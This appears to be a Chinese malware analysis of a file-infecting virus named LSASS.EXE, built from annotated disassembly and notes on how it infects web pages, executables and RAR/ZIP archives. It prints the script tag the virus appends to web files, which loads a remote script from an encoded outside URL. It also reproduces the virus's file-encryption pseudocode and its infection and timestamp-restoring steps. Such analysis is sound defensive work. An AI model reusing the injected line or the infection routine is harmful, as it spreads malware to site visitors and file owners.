00402BBF |. 8D4D 94 LEA ECX,DWORD PTR SS:[EBP-6C]
00402BC2 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2
00402BC6 |. FF30 PUSH DWORD PTR DS:[EAX]
00402BC8 |. 53 PUSH EBX
00402BC9 |. FF75 08 PUSH DWORD PTR SS:[EBP+8]
00402BCC |. FF15 14A34000 CALL DWORD PTR DS:[<&MSVCIRT.??0ifstrea>; MSVCIRT.??0ifstream@@QAE@PBDHH@Z
00402BD2 |. 8D45 94 LEA EAX,DWORD PTR SS:[EBP-6C]
00402BD5 |. C645 FC 03 MOV BYTE PTR SS:[EBP-4],3
00402BD9 |. 85C0 TEST EAX,EAX
00402BDB |. 74 0A JE SHORT LSASS.00402BE7
00402BDD |. 8B45 94 MOV EAX,DWORD PTR SS:[EBP-6C]
00402BE0 |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]
00402BE3 |. 8D4405 94 LEA EAX,DWORD PTR SS:[EBP+EAX-6C]
00402BE7 |> F640 08 06 TEST BYTE PTR DS:[EAX+8],6
00402BEB |. 0F85 A4000000 JNZ LSASS.00402C95
00402BF1 |. 85C0 TEST EAX,EAX
00402BF3 |. 0F84 9C000000 JE LSASS.00402C95
00402BF9 |. 68 10F44000 PUSH LSASS.0040F410
00402BFE |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402C01 |. E8 165A0000 CALL <JMP.&MFC42.#860_??4CString@@QAEAB>
00402C06 |> 8B45 94 /MOV EAX,DWORD PTR SS:[EBP-6C]
00402C09 |. 8B40 04 |MOV EAX,DWORD PTR DS:[EAX+4]
00402C0C |. 845C05 9C |TEST BYTE PTR SS:[EBP+EAX-64],BL
00402C10 |. 75 28 |JNZ SHORT LSASS.00402C3A
00402C12 |. 6A 0A |PUSH 0A
00402C14 |. 8D85 94FBFFFF |LEA EAX,DWORD PTR SS:[EBP-46C]
00402C1A |. 68 00040000 |PUSH 400
00402C1F |. 50 |PUSH EAX
00402C20 |. 8D4D 94 |LEA ECX,DWORD PTR SS:[EBP-6C]
00402C23 |. FF15 10A34000 |CALL DWORD PTR DS:[<&MSVCIRT.?getline@>; MSVCIRT.?getline@istream@@QAEAAV1@PAEHD@Z
00402C29 |. 8D85 94FBFFFF |LEA EAX,DWORD PTR SS:[EBP-46C]
00402C2F |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402C32 |. 50 |PUSH EAX
00402C33 |. E8 0E5A0000 |CALL <JMP.&MFC42.#941_??YCString@@QAEA>
00402C38 |.^ EB CC /JMP SHORT LSASS.00402C06
00402C3A |> 8D4D 94 LEA ECX,DWORD PTR SS:[EBP-6C]
00402C3D |. FF15 0CA34000 CALL DWORD PTR DS:[<&MSVCIRT.?close@ifs>; MSVCIRT.?close@ofstream@@QAEXXZ
00402C43 |. FF75 0C PUSH DWORD PTR SS:[EBP+C]
00402C46 |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402C49 |. E8 C2590000 CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00402C4E |. 83F8 FF CMP EAX,-1
00402C51 |. 75 42 JNZ SHORT LSASS.00402C95
00402C53 |. 8B86 B8010000 MOV EAX,DWORD PTR DS:[ESI+1B8]
00402C59 |. 81C6 B8010000 ADD ESI,1B8
00402C5F |. 6A 00 PUSH 0
00402C61 |. 53 PUSH EBX
00402C62 |. FF75 08 PUSH DWORD PTR SS:[EBP+8]
00402C65 |. 8BCE MOV ECX,ESI
00402C67 |. FF50 28 CALL DWORD PTR DS:[EAX+28] ; openfile
00402C6A |. 85C0 TEST EAX,EAX
00402C6C |. 74 27 JE SHORT LSASS.00402C95
00402C6E |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
00402C70 |. 6A 02 PUSH 2
00402C72 |. 6A 00 PUSH 0
00402C74 |. 8BCE MOV ECX,ESI
00402C76 |. FF50 30 CALL DWORD PTR DS:[EAX+30] ; seekfile
00402C79 |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]
00402C7C |. 8B16 MOV EDX,DWORD PTR DS:[ESI]
00402C7E |. 8B48 F8 MOV ECX,DWORD PTR DS:[EAX-8]
00402C81 |. 51 PUSH ECX
00402C82 |. 50 PUSH EAX
00402C83 |. 8BCE MOV ECX,ESI
00402C85 |. FF52 40 CALL DWORD PTR DS:[EDX+40] ; writefile
00402C88 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
00402C8A |. 8BCE MOV ECX,ESI
00402C8C |. FF50 54 CALL DWORD PTR DS:[EAX+54] ; close
00402C8F |. FF05 08F44000 INC DWORD PTR DS:[40F408]
00402C95 |> 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]
00402C98 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2
00402C9C |. FF15 08A34000 CALL DWORD PTR DS:[<&MSVCIRT.??1ifstrea>; MSVCIRT.??1ifstream@@UAE@XZ
00402CA2 |. 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]
00402CA5 |. FF15 04A34000 CALL DWORD PTR DS:[<&MSVCIRT.??1ios@@UA>; MSVCIRT.??1ios@@UAE@XZ
00402CAB |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402CAE |. 885D FC MOV BYTE PTR SS:[EBP-4],BL
00402CB1 |. E8 46580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X>
00402CB6 |. 8065 FC 00 AND BYTE PTR SS:[EBP-4],0
00402CBA |. 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8]
00402CBD |. E8 3A580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X>
00402CC2 |. 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
00402CC6 |. 8D4D 0C LEA ECX,DWORD PTR SS:[EBP+C]
00402CC9 |. E8 2E580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X>
00402CCE |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
00402CD1 |. 5E POP ESI
00402CD2 |. 5B POP EBX
00402CD3 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
00402CDA |. C9 LEAVE
00402CDB /. C2 0800 RETN 8
感染文件类型:(文件全名后三位)
1 .htm, tml, .js
2 .exe
3 .rar, .zip
web文件感染函数:
1 按行读取web文件内容
2 如果没有找到匹配的:document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70'></sCrIpT>"); 则在文件尾部加上这一句。
exe文件感染函数:
被感染的文件包括三个部分:
1)被修改图标资源的病毒体
2)被加密的原文件
3)病毒体
1 取C:/WINDOWS/system32/Com/LSASS.EXE文件信息。
2 读取C:/WINDOWS/system32/Com/LSASS.EXE文件到内存,并修改相应的资源内容,然后写到com/~临时文件中。
3 取待感染文件信息(后面修改文件时间用)。
4 读取待感染文件内容到内存,并进行加密,然后追加到com/~临时文件中。
5 再将C:/WINDOWS/system32/Com/LSASS.EXE文件读入内存,并加密写到com/~临时文件中。
6 将C:/WINDOWS/system32/Com/~临时文件拷贝到被感染文件位置。
//Add on 22:57 2008-1-9
对EXE的加密算法:
dwStart = 21B
g_dwVFileSize
g_dwNeedFilePos
bInfect = TRUE;
/* 每读取g_dwVFileSize个字节再加密的。
*
*/
while (fread(g_dwNeedFilePos/*pBuf*/, 1, g_dwVFileSize, file))
{
if (!bInfect) break;
ECX = dwStart;
ECX += 0x09;
while (1)
{
dwTmp = ECX;
if ECX > g_dwVFileSize
break;
EDX = g_dwNeedFilePos;
ECX += EDX;
byte tmp = Get [ECX];
not tmp;
Set [ECX], tmp;
ECX = dwTmp;
ECX += 0x0B;
}
ECX = 0;
dwTmp = ECX;
if g_dwVFileSize <= ECX
goto aa;
do
{
EDX = g_dwNeedFilePos;
ECX += EDX;
byte tmp = Get[ECX];
not tmp;
Set [ECX], tmp;
ECX = dwTmp;
ECX += 2;
if (ECX >= g_dwVFileSize)
break;
} while (1)
aa:
bInfect = FALSE;
}
//Add end 22:57 2008-1-9
具体分析见如下代码及注释:
/
1 遍历文件函数
00402200 |. 8D85 F4FDFFFF LEA EAX,DWORD PTR SS:[EBP-20C]
00402206 |. 50 PUSH EAX ; /pFindFileData
00402207 |. FF75 CC PUSH DWORD PTR SS:[EBP-34] ; |FileName
0040220A |. FF15 08A14000 CALL DWORD PTR DS:[<&KERNEL32.FindFirstFileA>] ; /FindFirstFileA
00402210 |. 6A 01 PUSH 1 ; /RemoveMsg = PM_REMOVE
00402212 |. 8945 B8 MOV DWORD PTR SS:[EBP-48],EAX ; |
00402215 |. 53 PUSH EBX ; |MsgFilterMax
00402216 |. 53 PUSH EBX ; |MsgFilterMin
00402217 |. 8D85 D8FDFFFF LEA EAX,DWORD PTR SS:[EBP-228] ; |
0040221D |. 53 PUSH EBX ; |hWnd
0040221E |. 50 PUSH EAX ; |pMsg
0040221F |. FF15 30A44000 CALL DWORD PTR DS:[<&USER32.PeekMessageA>] ; /PeekMessageA
00402225 |. 837D B8 FF CMP DWORD PTR SS:[EBP-48],-1
00402229 |. 0F84 BC080000 JE LSASS.00402AEB
0040222F |. BF 58E44000 MOV EDI,LSASS.0040E458 ; ASCII "8A;"
00402234 |> 8D85 20FEFFFF /LEA EAX,DWORD PTR SS:[EBP-1E0]
0040223A |. 68 04D14000 |PUSH LSASS.0040D104 ; /s2 = "."
0040223F |. 50 |PUSH EAX ; |s1
00402240 |. E8 0B650000 |CALL <JMP.&MSVCRT.strcmp> ; /strcmp
00402245 |. 59 |POP ECX
00402246 |. 85C0 |TEST EAX,EAX
00402248 |. 59 |POP ECX
00402249 |. 0F84 7B080000 |JE LSASS.00402ACA
0040224F |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
00402255 |. 68 00D14000 |PUSH LSASS.0040D100 ; /s2 = ".."
0040225A |. 50 |PUSH EAX ; |s1
0040225B |. E8 F0640000 |CALL <JMP.&MSVCRT.strcmp> ; /strcmp
00402260 |. 59 |POP ECX
00402261 |. 85C0 |TEST EAX,EAX
00402263 |. 59 |POP ECX
00402264 |. 0F84 60080000 |JE LSASS.00402ACA
0040226A |. F685 F4FDFFFF 10 |TEST BYTE PTR SS:[EBP-20C],10
00402271 |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
...
004023A7 |. 0F86 1D070000 |JBE LSASS.00402ACA
004023AD |. FF75 C4 |PUSH DWORD PTR SS:[EBP-3C] ; /s2 = "tml"
004023B0 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004023B3 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004023B9 |. 59 |POP ECX
004023BA |. 85C0 |TEST EAX,EAX
004023BC |. 59 |POP ECX
004023BD |. 0F84 9E060000 |JE LSASS.00402A61
004023C3 |. FF75 C8 |PUSH DWORD PTR SS:[EBP-38] ; /s2 = "htm"
004023C6 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004023C9 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004023CF |. 59 |POP ECX
004023D0 |. 85C0 |TEST EAX,EAX
004023D2 |. 59 |POP ECX
004023D3 |. 0F84 88060000 |JE LSASS.00402A61
004023D9 |. 68 ACD14000 |PUSH LSASS.0040D1AC ; /s2 = ".js"
004023DE |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004023E1 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004023E7 |. 59 |POP ECX
004023E8 |. 85C0 |TEST EAX,EAX
004023EA |. 59 |POP ECX
004023EB |. 75 6D |JNZ SHORT LSASS.0040245A
004023ED |. 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],19000 ; web file infect
004023F7 |. 0F83 CD060000 |JNB LSASS.00402ACA
004023FD |. 51 |PUSH ECX
004023FE |. 8D86 9D010000 |LEA EAX,DWORD PTR DS:[ESI+19D]
00402404 |. 8BCC |MOV ECX,ESP
00402406 |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
00402409 |. 50 |PUSH EAX
0040240A |. E8 FB610000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
0040240F |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]
00402412 |. 68 08D14000 |PUSH LSASS.0040D108
00402417 |. 50 |PUSH EAX
00402418 |. 8D85 50FFFFFF |LEA EAX,DWORD PTR SS:[EBP-B0]
0040241E |. 50 |PUSH EAX
0040241F |. C645 FC 11 |MOV BYTE PTR SS:[EBP-4],11
00402423 |. E8 06620000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402428 |. 51 |PUSH ECX
00402429 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
0040242F |. 8BCC |MOV ECX,ESP
00402431 |. 8965 D0 |MOV DWORD PTR SS:[EBP-30],ESP
00402434 |. 52 |PUSH EDX
00402435 |. 50 |PUSH EAX
00402436 |. 51 |PUSH ECX
00402437 |. C645 FC 12 |MOV BYTE PTR SS:[EBP-4],12
0040243B |. E8 EE610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402440 |. 8BCE |MOV ECX,ESI
00402442 |. C645 FC 13 |MOV BYTE PTR SS:[EBP-4],13
00402446 |. E8 4C070000 |CALL LSASS.00402B97 ; web file infect function
0040244B |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
0040244F |. 8D8D 50FFFFFF |LEA ECX,DWORD PTR SS:[EBP-B0]
00402455 |. E9 6B060000 |JMP LSASS.00402AC5
0040245A |> 68 A8D14000 |PUSH LSASS.0040D1A8 ; /s2 = "exe"
0040245F |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
00402462 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
00402468 |. 59 |POP ECX
00402469 |. 85C0 |TEST EAX,EAX
0040246B |. 59 |POP ECX
0040246C |. 0F85 6C010000 |JNZ LSASS.004025DE ; exe infect
00402472 |. 8B85 00FEFFFF |MOV EAX,DWORD PTR SS:[EBP-200]
00402478 |. 68 5CE44000 |PUSH LSASS.0040E45C ; ASCII "C:/WINDOWS/system32/com/LSASS.EXE"
0040247D |. 8945 98 |MOV DWORD PTR SS:[EBP-68],EAX
00402480 |. 8B85 04FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1FC]
00402486 |. 8945 9C |MOV DWORD PTR SS:[EBP-64],EAX
00402489 |. 8B85 08FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F8]
0040248F |. 8945 A4 |MOV DWORD PTR SS:[EBP-5C],EAX
00402492 |. 8B85 0CFEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F4]
00402498 |. 8945 A8 |MOV DWORD PTR SS:[EBP-58],EAX
0040249B |. 8B85 F8FDFFFF |MOV EAX,DWORD PTR SS:[EBP-208]
004024A1 |. 8945 B0 |MOV DWORD PTR SS:[EBP-50],EAX
004024A4 |. 8B85 FCFDFFFF |MOV EAX,DWORD PTR SS:[EBP-204]
004024AA |. 8D8E 78010000 |LEA ECX,DWORD PTR DS:[ESI+178]
004024B0 |. 889E B3010000 |MOV BYTE PTR DS:[ESI+1B3],BL
004024B6 |. 8945 B4 |MOV DWORD PTR SS:[EBP-4C],EAX
004024B9 |. E8 5E610000 |CALL <JMP.&MFC42.#860_??4CString@@QAEABV0@PBD@Z>
004024BE |. 68 A4D14000 |PUSH LSASS.0040D1A4 ; ASCII "/~"
004024C3 |. 8D85 48FFFFFF |LEA EAX,DWORD PTR SS:[EBP-B8]
004024C9 |. 57 |PUSH EDI
004024CA |. 50 |PUSH EAX
004024CB |. E8 5E610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004024D0 |. 8D8E 7C010000 |LEA ECX,DWORD PTR DS:[ESI+17C]
004024D6 |. 50 |PUSH EAX
004024D7 |. C645 FC 14 |MOV BYTE PTR SS:[EBP-4],14
004024DB |. E8 42610000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
004024E0 |. 8D8D 48FFFFFF |LEA ECX,DWORD PTR SS:[EBP-B8]
004024E6 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
004024EA |. E8 0D600000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004024EF |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
004024F5 |. 50 |PUSH EAX
004024F6 |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]
004024F9 |. 50 |PUSH EAX
004024FA |. 8D85 40FFFFFF |LEA EAX,DWORD PTR SS:[EBP-C0]
00402500 |. 50 |PUSH EAX
00402501 |. E8 28610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402506 |. 8D8E 74010000 |LEA ECX,DWORD PTR DS:[ESI+174]
0040250C |. 50 |PUSH EAX
0040250D |. C645 FC 15 |MOV BYTE PTR SS:[EBP-4],15
00402511 |. E8 0C610000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
00402516 |. 8D8D 40FFFFFF |LEA ECX,DWORD PTR SS:[EBP-C0]
0040251C |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402520 |. E8 D75F0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402525 |. 8BCE |MOV ECX,ESI
00402527 |. E8 1C3E0000 |CALL LSASS.00406348 ; exe file infect function
0040252C |. 84C0 |TEST AL,AL
0040252E |. 74 04 |JE SHORT LSASS.00402534
00402530 |. C645 EF 01 |MOV BYTE PTR SS:[EBP-11],1
00402534 |> 389E B3010000 |CMP BYTE PTR DS:[ESI+1B3],BL
0040253A |. 0F84 8C000000 |JE LSASS.004025CC
00402540 |. 53 |PUSH EBX
00402541 |. 51 |PUSH ECX
00402542 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]
00402548 |. 8BC4 |MOV EAX,ESP
0040254A |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
0040254D |. 51 |PUSH ECX
0040254E |. 8D4D 08 |LEA ECX,DWORD PTR SS:[EBP+8]
00402551 |. 51 |PUSH ECX
00402552 |. 50 |PUSH EAX
00402553 |. E8 D6600000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402558 |. E8 64F8FFFF |CALL LSASS.00401DC1 ; setFileAttributes
0040255D |. 59 |POP ECX
0040255E |. 8D86 74010000 |LEA EAX,DWORD PTR DS:[ESI+174]
00402564 |. 8BCC |MOV ECX,ESP
00402566 |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
00402569 |. 50 |PUSH EAX
0040256A |. E8 9B600000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
0040256F |. 51 |PUSH ECX
00402570 |. 8D86 7C010000 |LEA EAX,DWORD PTR DS:[ESI+17C]
00402576 |. 8BCC |MOV ECX,ESP
00402578 |. 8965 D0 |MOV DWORD PTR SS:[EBP-30],ESP
0040257B |. 50 |PUSH EAX
0040257C |. C645 FC 16 |MOV BYTE PTR SS:[EBP-4],16
00402580 |. E8 85600000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
00402585 |. 8BCE |MOV ECX,ESI
00402587 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
0040258B |. E8 4E070000 |CALL LSASS.00402CDE ; copy com/~ to original path
00402590 |. 8B86 74010000 |MOV EAX,DWORD PTR DS:[ESI+174]
00402596 |. 53 |PUSH EBX ; /hTemplateFile
00402597 |. 68 80000000 |PUSH 80 ; |Attributes = NORMAL
0040259C |. 6A 03 |PUSH 3 ; |Mode = OPEN_EXISTING
0040259E |. 53 |PUSH EBX ; |pSecurity
0040259F |. 6A 03 |PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004025A1 |. 68 000000C0 |PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
004025A6 |. 50 |PUSH EAX ; |FileName
004025A7 |. FF15 E8A04000 |CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; /CreateFileA
004025AD |. 8D4D A4 |LEA ECX,DWORD PTR SS:[EBP-5C]
004025B0 |. 8945 D0 |MOV DWORD PTR SS:[EBP-30],EAX
004025B3 |. 51 |PUSH ECX ; /pLastWrite
004025B4 |. 8D4D 98 |LEA ECX,DWORD PTR SS:[EBP-68] ; |
004025B7 |. 51 |PUSH ECX ; |pLastAccess
004025B8 |. 8D4D B0 |LEA ECX,DWORD PTR SS:[EBP-50] ; |
004025BB |. 51 |PUSH ECX ; |pCreationTime
004025BC |. 50 |PUSH EAX ; |hFile
004025BD |. FF15 14A14000 |CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; /SetFileTime
004025C3 |. FF75 D0 |PUSH DWORD PTR SS:[EBP-30] ; /hObject
004025C6 |. FF15 74A04000 |CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; /CloseHandle
004025CC |> FFB6 7C010000 |PUSH DWORD PTR DS:[ESI+17C] ; /path
004025D2 |. FF15 58A34000 |CALL DWORD PTR DS:[<&MSVCRT._unlink>] ; /_unlink
004025D8 |. 59 |POP ECX
004025D9 |. E9 EC040000 |JMP LSASS.00402ACA
004025DE |> 68 A0D14000 |PUSH LSASS.0040D1A0 ; /s2 = "rar"
004025E3 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004025E6 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004025EC |. 59 |POP ECX
004025ED |. 85C0 |TEST EAX,EAX
004025EF |. 59 |POP ECX
004025F0 |. 74 18 |JE SHORT LSASS.0040260A
004025F2 |. 68 9CD14000 |PUSH LSASS.0040D19C ; /s2 = "zip"
004025F7 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004025FA |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
00402600 |. 59 |POP ECX
00402601 |. 85C0 |TEST EAX,EAX
00402603 |. 59 |POP ECX
00402604 |. 0F85 C0040000 |JNZ LSASS.00402ACA
0040260A |> 8B86 A6010000 |MOV EAX,DWORD PTR DS:[ESI+1A6]
00402610 |. 68 10F44000 |PUSH LSASS.0040F410 ; /s2 = "c:/program files/winrar/winrar.exe"
00402615 |. 50 |PUSH EAX ; |s1
00402616 |. FF15 A0A34000 |CALL DWORD PTR DS:[<&MSVCRT._mbscmp>] ; /_mbscmp
0040261C |. 59 |POP ECX
0040261D |. 85C0 |TEST EAX,EAX
0040261F |. 59 |POP ECX
00402620 |. 0F84 A4040000 |JE LSASS.00402ACA
00402626 |. 399E AA010000 |CMP DWORD PTR DS:[ESI+1AA],EBX ; rar, zip file infect
0040262C |. 0F8F 98040000 |JG LSASS.00402ACA
00402632 |. 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],500000
0040263C |. 0F87 88040000 |JA LSASS.00402ACA
00402642 |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
00402648 |. 50 |PUSH EAX
00402649 |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]
0040264C |. 50 |PUSH EAX
0040264D |. 8D85 34FFFFFF |LEA EAX,DWORD PTR SS:[EBP-CC]
00402653 |. 50 |PUSH EAX
00402654 |. E8 D55F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402659 |. 50 |PUSH EAX
0040265A |. 8D4D D8 |LEA ECX,DWORD PTR SS:[EBP-28]
0040265D |. C645 FC 17 |MOV BYTE PTR SS:[EBP-4],17
00402661 |. E8 BC5F0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
00402666 |. 8D8D 34FFFFFF |LEA ECX,DWORD PTR SS:[EBP-CC]
0040266C |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402670 |. E8 875E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402675 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
0040267A |. 8D85 7CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-84]
00402680 |. 57 |PUSH EDI
00402681 |. 50 |PUSH EAX
00402682 |. E8 A75F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402687 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]
0040268D |. C645 FC 18 |MOV BYTE PTR SS:[EBP-4],18
00402691 |. 51 |PUSH ECX
00402692 |. 50 |PUSH EAX
00402693 |. 8D85 54FFFFFF |LEA EAX,DWORD PTR SS:[EBP-AC]
00402699 |. 50 |PUSH EAX
0040269A |. E8 8F5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040269F |. 68 08D14000 |PUSH LSASS.0040D108
004026A4 |. 50 |PUSH EAX
004026A5 |. 8D45 94 |LEA EAX,DWORD PTR SS:[EBP-6C]
004026A8 |. C645 FC 19 |MOV BYTE PTR SS:[EBP-4],19
004026AC |. 50 |PUSH EAX
004026AD |. E8 7C5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004026B2 |. 50 |PUSH EAX
004026B3 |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]
004026B6 |. C645 FC 1A |MOV BYTE PTR SS:[EBP-4],1A
004026BA |. E8 635F0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
004026BF |. 8D4D 94 |LEA ECX,DWORD PTR SS:[EBP-6C]
004026C2 |. C645 FC 19 |MOV BYTE PTR SS:[EBP-4],19
004026C6 |. E8 315E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004026CB |. 8D8D 54FFFFFF |LEA ECX,DWORD PTR SS:[EBP-AC]
004026D1 |. C645 FC 18 |MOV BYTE PTR SS:[EBP-4],18
004026D5 |. E8 225E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004026DA |. 8D8D 7CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-84]
004026E0 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
004026E4 |. E8 135E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004026E9 |. 8D45 D8 |LEA EAX,DWORD PTR SS:[EBP-28]
004026EC |. 50 |PUSH EAX
004026ED |. 8D85 6CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-94]
004026F3 |. 68 8CD14000 |PUSH LSASS.0040D18C ; ASCII " X ""
004026F8 |. 50 |PUSH EAX
004026F9 |. E8 365F0000 |CALL <JMP.&MFC42.#926_??H@YG?AVCString@@PBDABV0@@Z>
004026FE |. 68 88D14000 |PUSH LSASS.0040D188 ; ASCII "" ""
00402703 |. 50 |PUSH EAX
00402704 |. 8D85 4CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-B4]
0040270A |. C645 FC 1B |MOV BYTE PTR SS:[EBP-4],1B
0040270E |. 50 |PUSH EAX
0040270F |. E8 1A5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402714 |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]
00402717 |. C645 FC 1C |MOV BYTE PTR SS:[EBP-4],1C
0040271B |. 51 |PUSH ECX
0040271C |. 50 |PUSH EAX
0040271D |. 8D85 74FFFFFF |LEA EAX,DWORD PTR SS:[EBP-8C]
00402723 |. 50 |PUSH EAX
00402724 |. E8 FF5E0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
00402729 |. 68 74D14000 |PUSH LSASS.0040D174 ; ASCII "" -r -inul -ibck -y"
0040272E |. 50 |PUSH EAX
0040272F |. 8D85 3CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-C4]
00402735 |. C645 FC 1D |MOV BYTE PTR SS:[EBP-4],1D
00402739 |. 50 |PUSH EAX
0040273A |. E8 EF5E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040273F |. C645 FC 1E |MOV BYTE PTR SS:[EBP-4],1E
00402743 |. 50 |PUSH EAX
00402744 |. 8D4D D4 |LEA ECX,DWORD PTR SS:[EBP-2C]
00402747 |. E8 D65E0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
0040274C |. 8D8D 3CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-C4]
00402752 |. C645 FC 1D |MOV BYTE PTR SS:[EBP-4],1D
00402756 |. E8 A15D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
0040275B |. 8D8D 74FFFFFF |LEA ECX,DWORD PTR SS:[EBP-8C]
00402761 |. C645 FC 1C |MOV BYTE PTR SS:[EBP-4],1C
00402765 |. E8 925D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
0040276A |. 8D8D 4CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-B4]
00402770 |. C645 FC 1B |MOV BYTE PTR SS:[EBP-4],1B
00402774 |. E8 835D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402779 |. 8D8D 6CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-94]
